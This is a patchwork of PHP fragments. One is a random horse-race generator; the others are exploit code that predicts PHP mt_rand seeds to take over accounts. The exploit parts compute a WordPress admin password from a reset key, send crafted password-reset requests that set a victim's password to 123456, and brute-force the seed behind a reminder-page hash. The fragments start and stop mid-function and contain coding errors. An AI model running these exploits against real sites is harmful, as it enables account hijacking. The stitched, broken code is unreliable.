function horses_generate($seed) { global $horses_wins, $cnt, $horses_count, $races_count, $horses_coefficients, $horses_names; if (!$seed) { $seed = getseed(time() + 30 * 60 * $cnt); } //print $seed."<br>"; //srand($seed); srand(); $s = $races_count; //print "--".$horses_count;exit; $res1 = runsql("select Name from ut_gladiator_names where CountryID='1' order by rand({$seed}) limit 0,{$horses_count}"); for ($i = 1; $i <= $horses_count; $i++) { if ($i == $horses_count) { $horses_wins[$i] = $s; } elseif ($i == 1) { $horses_wins[$i] = round(rand(1, $s + i - $horses_count) / 2); } else { $horses_wins[$i] = rand(1, $s + i - $horses_count); } //print "- $horses_wins[$i]<br>"; if ($horses_wins[$i] == 0) { $horses_wins[$i] = 1; } $s = $s - $horses_wins[$i]; $horses_coefficients[$i] = round($races_count / $horses_wins[$i] * (0.9 + rand(-0.1, 0.1)), 1); $r1 = mysql_fetch_array($res1); $horses_names[$i] = $r1[0]; } }
function calcpass($resetkey, $seed = false) { mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand(); define('BUGGY', $a == $b); echo "[-] wpress password computation. runnig in " . (BUGGY ? 'fast' : 'slow') . " mode\n"; echo "[+] got key {$resetkey} via mail\n"; if (!$seed) { $seed = getseed($resetkey); } if ($seed === false) { die("[!] seed not found :( try using identical php version (< 5.2.5)\n"); } mt_srand($seed); echo "[-] seed for key " . wp_generate_password(20, false) . " is {$seed}\n"; $pass = wp_generate_password(); echo "[+] new credentials are admin:{$pass}\n"; return $pass; }
$data .= "Referer: http://{$host}{$path}\r\n"; $data .= "Host: {$host}\r\n"; $data .= "Content-Length: " . strlen($cmd) . "\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) { $resp .= fread($fp, 1024); } fclose($fp); preg_match('/Set-Cookie:\\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid); if (!$sid) { exit("Exploit Failed!\n"); } $seed = getseed(); if ($seed) { mt_srand($seed); random(); mt_rand(); $id = random(); $fp = fsockopen($host, 80); $cmd = 'action=getpasswd&uid=' . $uid . '&id=' . $id . '&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash=' . $hash[1]; $data = "POST " . $path . "member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://{$host}{$path}\r\n"; $data .= "Host: {$host}\r\n"; $data .= "Content-Length: " . strlen($cmd) . "\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data);
$packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID={$sess};\r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; fputs($ock, $packet); while (!feof($ock)) { $resp = fgets($ock); preg_match('@name="sc" value="([0-9a-f]+)"@i', $resp, $out); if (isset($out[1])) { $md5 = $out[1]; break; } } if ($md5) { $seed = getseed($md5); if ($seed) { echo "[+] Seed for next random number is {$seed}\n"; } else { die("[-] Can't calculate seed\n"); } } else { die("[-] Random number hash not found\n"); } function getseed($md5) { global $sess; for ($i = 0; $i <= 32767; $i++) { if ($md5 == md5($sess . $i)) { return $i; }